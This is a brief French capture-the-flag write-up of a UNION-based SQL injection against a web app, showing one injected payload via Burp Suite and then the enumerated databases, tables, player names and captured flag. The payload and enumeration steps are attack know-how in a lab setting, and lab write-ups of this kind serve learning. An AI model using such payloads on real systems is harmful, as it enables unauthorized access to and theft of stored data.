SQLI (UNION Injection) - Pentesting Web

Nous interceptons la requête avec Burp Suite et altérons la variable player :

jordan' union select database()-- -

Le nom de la base de données est november.

Pour lister toutes les bases de données :

Résultat : mysql,information_schema,performance_schema,sys, november

Lister les tables de november :

Lister les colonnes de la table players :

Colonnes trouvées : player

Extraction des Données Utilisateur

Players trouvées : ippsec,celesian,big0us,luska,tinyboy

Extraction du flag :

  • Flag trouvé : UHC{F1rst_5tep_2_Qualify}

Mis à jour

Ce contenu vous a-t-il été utile ?